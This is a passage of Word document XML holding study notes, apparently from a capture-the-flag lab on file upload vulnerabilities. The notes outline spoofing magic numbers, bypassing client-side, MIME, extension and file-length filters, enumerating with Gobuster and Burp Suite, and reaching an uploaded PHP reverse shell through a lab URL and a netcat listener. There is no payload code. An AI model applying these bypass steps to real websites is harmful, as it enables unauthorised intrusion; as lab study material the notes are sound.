      <w:r w:rsidRPr="0084205E">
        <w:t>hexeditor</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="3EC132FF" w14:textId="1CE3C0A3" w:rsidR="001C078E" w:rsidRPr="0084205E" w:rsidRDefault="001C078E" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="15"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t xml:space="preserve">AAAA </w:t>
      </w:r>
      <w:r w:rsidRPr="0084205E">
        <w:sym w:font="Wingdings" w:char="F0E0"/>
      </w:r>
      <w:r w:rsidRPr="0084205E">
        <w:t xml:space="preserve"> 41 41 41 41</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6861EC9A" w14:textId="3745103B" w:rsidR="001C078E" w:rsidRPr="0084205E" w:rsidRDefault="001C078E" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="15"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>Change to HEX of magic numbers</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6F8C70F0" w14:textId="00DBAB02" w:rsidR="001C078E" w:rsidRPr="0084205E" w:rsidRDefault="001C078E" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="15"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>Save and exit</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="063C0DE6" w14:textId="6581CF38" w:rsidR="001C078E" w:rsidRPr="0084205E" w:rsidRDefault="001C078E" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="15"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>“file” command to spoof file type</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3FF77EF8" w14:textId="33BA7D30" w:rsidR="00D11605" w:rsidRPr="0084205E" w:rsidRDefault="00D11605" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="15"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>Access shell directly using URI</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="14616CB6" w14:textId="2FEAE9AD" w:rsidR="002D09B9" w:rsidRPr="0084205E" w:rsidRDefault="002D09B9" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="15"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>Assume directory and attach file name</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="62135655" w14:textId="04A17A95" w:rsidR="002D09B9" w:rsidRPr="0084205E" w:rsidRDefault="002D09B9" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="15"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t xml:space="preserve">Ex. </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0084205E">
        <w:t>magic.uploadvulns.thm</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0084205E">
        <w:t>/graphics/php-reverse-</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0084205E">
        <w:t>shell.php</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="41E86631" w14:textId="171F0BC3" w:rsidR="002D09B9" w:rsidRPr="0084205E" w:rsidRDefault="002D09B9" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="15"/>
        </w:numPr>
        <w:pBdr>
          <w:bottom w:val="single" w:sz="6" w:space="1" w:color="auto"/>
        </w:pBdr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>Interface with netcat listening post</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6132F9D3" w14:textId="77777777" w:rsidR="005A2BB9" w:rsidRPr="0084205E" w:rsidRDefault="005A2BB9" w:rsidP="0084205E">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:ind w:left="1800"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="767AC456" w14:textId="7D0A44B4" w:rsidR="002D09B9" w:rsidRPr="0084205E" w:rsidRDefault="005A2BB9" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="15"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>EXAMPLE METHODOLOGY</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="06622408" w14:textId="45C72500" w:rsidR="002D09B9" w:rsidRPr="0084205E" w:rsidRDefault="002D09B9" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="15"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="0084205E">
        <w:t>Take a look</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="0084205E">
        <w:t xml:space="preserve"> at the website as a whole</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="03E3405A" w14:textId="1E9C712A" w:rsidR="002D09B9" w:rsidRPr="0084205E" w:rsidRDefault="002D09B9" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="15"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0084205E">
        <w:t>Wappalyzer</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="72AE1BB1" w14:textId="715CAE7C" w:rsidR="002D09B9" w:rsidRPr="0084205E" w:rsidRDefault="002D09B9" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="15"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>Indicators of what languages and frameworks the web application might have been built with</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0B9EB107" w14:textId="763DF437" w:rsidR="002D09B9" w:rsidRPr="0084205E" w:rsidRDefault="002D09B9" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="15"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t xml:space="preserve">Make request to website (refresh) and intercept with </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0084205E">
        <w:t>Burpsuite</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="41CED213" w14:textId="6FA105EE" w:rsidR="00B13CA6" w:rsidRPr="0084205E" w:rsidRDefault="00B13CA6" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="15"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>Headers</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5B1AF369" w14:textId="6EBB9076" w:rsidR="00B13CA6" w:rsidRPr="0084205E" w:rsidRDefault="00B13CA6" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="4"/>
          <w:numId w:val="15"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>Server, x-powered-by</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2CA1F8B4" w14:textId="2780ED7C" w:rsidR="00B13CA6" w:rsidRPr="0084205E" w:rsidRDefault="00B13CA6" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="15"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>Look for vectors of attack such as an upload page</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="18236DD0" w14:textId="7A8B654F" w:rsidR="00B13CA6" w:rsidRPr="0084205E" w:rsidRDefault="00B13CA6" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="15"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>After finding an upload page, inspect further</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="50BA7DEF" w14:textId="2489B0F9" w:rsidR="00B13CA6" w:rsidRPr="0084205E" w:rsidRDefault="00B13CA6" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="15"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>Look at source code for client-side scripts to determine their presence</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="51571354" w14:textId="33D1FB19" w:rsidR="00B13CA6" w:rsidRPr="0084205E" w:rsidRDefault="00B13CA6" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="15"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>First stage of bypass</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="199AADA0" w14:textId="5D0DAF92" w:rsidR="00B13CA6" w:rsidRPr="0084205E" w:rsidRDefault="00B13CA6" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="15"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>Attempt completely innocent file upload</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="711560AF" w14:textId="653FA9CD" w:rsidR="00B13CA6" w:rsidRPr="0084205E" w:rsidRDefault="00B13CA6" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="15"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>Look to see how file is accessed</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="566211E9" w14:textId="39F3BDB8" w:rsidR="00B13CA6" w:rsidRPr="0084205E" w:rsidRDefault="00B13CA6" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="15"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>Directly?</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="56C20DBD" w14:textId="5392091C" w:rsidR="00B13CA6" w:rsidRPr="0084205E" w:rsidRDefault="00B13CA6" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="15"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>Embedded in page?</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2474646B" w14:textId="1D603CBB" w:rsidR="00B13CA6" w:rsidRPr="0084205E" w:rsidRDefault="00B13CA6" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="15"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>Website naming scheme</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="100693F3" w14:textId="3BDAC079" w:rsidR="00B13CA6" w:rsidRPr="0084205E" w:rsidRDefault="00B13CA6" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="15"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0084205E">
        <w:t>Gobuster</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0084205E">
        <w:t xml:space="preserve"> enumeration</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5216BDE5" w14:textId="556ED991" w:rsidR="00B13CA6" w:rsidRPr="0084205E" w:rsidRDefault="00B13CA6" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="15"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:lastRenderedPageBreak/>
        <w:t>Determine baseline accepted file</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="189D694B" w14:textId="0DA63A0A" w:rsidR="00B13CA6" w:rsidRPr="0084205E" w:rsidRDefault="00B13CA6" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="15"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0084205E">
        <w:t>Gobuster</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0084205E">
        <w:t xml:space="preserve"> -x switch – look for files with specific extensions</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3D0D4988" w14:textId="1A2A6EED" w:rsidR="00B13CA6" w:rsidRPr="0084205E" w:rsidRDefault="00B13CA6" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="4"/>
          <w:numId w:val="15"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t xml:space="preserve">Ex. -x </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="0084205E">
        <w:t>php,txt</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="0084205E">
        <w:t>,html</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="68EE3883" w14:textId="1AB3D15E" w:rsidR="00B13CA6" w:rsidRPr="0084205E" w:rsidRDefault="00B13CA6" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="15"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>Helpful if server is changing names of files being uploaded</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7F73C1EF" w14:textId="1A9A1DF1" w:rsidR="00B13CA6" w:rsidRPr="0084205E" w:rsidRDefault="00B13CA6" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="15"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>After determining file upload and storage process, attempt malicious file upload.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="257B74DA" w14:textId="05B6D6DE" w:rsidR="00B13CA6" w:rsidRPr="0084205E" w:rsidRDefault="00B13CA6" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="15"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>Bypass client-side filters</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="525DB73F" w14:textId="1700829B" w:rsidR="00B13CA6" w:rsidRPr="0084205E" w:rsidRDefault="00B13CA6" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="15"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>When stopped by server-side filter, error messages can assist in determining issue</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="099F3460" w14:textId="384C34B9" w:rsidR="00B13CA6" w:rsidRPr="0084205E" w:rsidRDefault="00B13CA6" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="15"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t xml:space="preserve">If file can be uploaded with nonexistent extension type </w:t>
      </w:r>
      <w:r w:rsidRPr="0084205E">
        <w:sym w:font="Wingdings" w:char="F0E0"/>
      </w:r>
      <w:r w:rsidRPr="0084205E">
        <w:t xml:space="preserve"> server using blacklist</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5E8F71F3" w14:textId="031C06C4" w:rsidR="0028776F" w:rsidRPr="0084205E" w:rsidRDefault="0028776F" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="15"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>If upload fails, extension filters will be using a whitelist</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="653C3656" w14:textId="6C0AF74B" w:rsidR="0028776F" w:rsidRPr="0084205E" w:rsidRDefault="0028776F" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="15"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>Try re-uploading innocent item with magic numbers changed to reflect an expected filtered upload</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7BBDD65A" w14:textId="7210ED49" w:rsidR="0028776F" w:rsidRPr="0084205E" w:rsidRDefault="0028776F" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="15"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t xml:space="preserve">If rejected </w:t>
      </w:r>
      <w:r w:rsidRPr="0084205E">
        <w:sym w:font="Wingdings" w:char="F0E0"/>
      </w:r>
      <w:r w:rsidRPr="0084205E">
        <w:t xml:space="preserve"> server using magic number filter</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0E6BFA84" w14:textId="7F4534B5" w:rsidR="0028776F" w:rsidRPr="0084205E" w:rsidRDefault="0028776F" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="15"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t xml:space="preserve">Upload innocent file but intercept request with </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0084205E">
        <w:t>Burpsuite</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0084205E">
        <w:t xml:space="preserve"> and change MIME type to something likely filtered</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1D040CBA" w14:textId="4C4710E8" w:rsidR="0028776F" w:rsidRPr="0084205E" w:rsidRDefault="0028776F" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="15"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t xml:space="preserve">If rejected </w:t>
      </w:r>
      <w:r w:rsidRPr="0084205E">
        <w:sym w:font="Wingdings" w:char="F0E0"/>
      </w:r>
      <w:r w:rsidRPr="0084205E">
        <w:t xml:space="preserve"> server filtering based on MIME types</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5D605FA8" w14:textId="0153CCEE" w:rsidR="0028776F" w:rsidRPr="0084205E" w:rsidRDefault="0028776F" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="15"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>Enumerating file length filters</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="06E97DC3" w14:textId="293CA9E1" w:rsidR="0028776F" w:rsidRPr="0084205E" w:rsidRDefault="0028776F" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="15"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>Uploading small files versus large files</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="174DF71B" w14:textId="01159745" w:rsidR="0028776F" w:rsidRPr="0084205E" w:rsidRDefault="0028776F" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="4"/>
          <w:numId w:val="15"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>Progressive overload to determine cutoff</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3458EDDC" w14:textId="23F06DEE" w:rsidR="0028776F" w:rsidRPr="0084205E" w:rsidRDefault="0028776F" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="4"/>
          <w:numId w:val="15"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>Small file length limit may prevent upload of common reverse shell using</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="59B6041F" w14:textId="0D4F3FF0" w:rsidR="0028776F" w:rsidRPr="0084205E" w:rsidRDefault="00484956" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="15"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
